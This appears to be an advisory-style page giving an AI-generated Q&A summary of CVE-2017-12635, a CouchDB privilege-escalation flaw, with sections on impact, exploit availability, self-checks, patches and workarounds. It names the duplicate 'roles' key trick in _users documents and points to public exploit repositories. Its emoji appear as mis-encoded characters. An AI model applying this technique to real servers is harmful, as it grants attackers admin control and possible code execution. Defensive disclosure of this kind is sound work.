This is a summary of the AI-generated 10-question deep analysis. The full version (longer answers, follow-up Q&A, related CVEs) requires login. Read the full analysis β
Q1What is this vulnerability? (Essence + Consequences)
π¨ **Essence**: A critical privilege escalation flaw in Apache CouchDB.β¦
π **Privileges**: Escalate from **Non-Admin** to **Admin** (`_admin` role). ποΈ **Data Access**: Full read/write access to all databases. π» **Impact**: Potential Remote Code Execution (RCE) via shell command access. π
Q5Is exploitation threshold high? (Auth/Config)
β οΈ **Threshold**: **LOW**. π **Auth**: Requires a valid non-admin user account to submit the malicious `_users` document. βοΈ **Config**: Exploits the JSON parsing logic directly via HTTP API. π‘
Q6Is there a public Exp? (PoC/Wild Exploitation)
π **Public Exp**: **YES**. Multiple POCs and Exploits available on GitHub (e.g., `CVE-2017-12635-EXP`, `CVE-2017-12635-POC`). π **Wild Exploitation**: High risk due to simple Python scripts available. π
Q7How to self-check? (Features/Scanning)
π **Self-Check**: Scan for CouchDB instances on port 5984. π§ͺ **Test**: Attempt to create a user with duplicate `roles` keys in the JSON payload.β¦
π‘οΈ **Fixed**: **YES**. Official patches released. β **Solution**: Upgrade to **CouchDB 1.7.0** or **2.1.1+**. π **Vendor Advisory**: Gentoo GLSA-201711-16 and Debian LTS updates confirm fixes. π
Q9What if no patch? (Workaround)
π§ **Workaround**: If patching is impossible, **disable public registration** of users. π **Mitigation**: Restrict access to the `_users` database via firewall or reverse proxy.β¦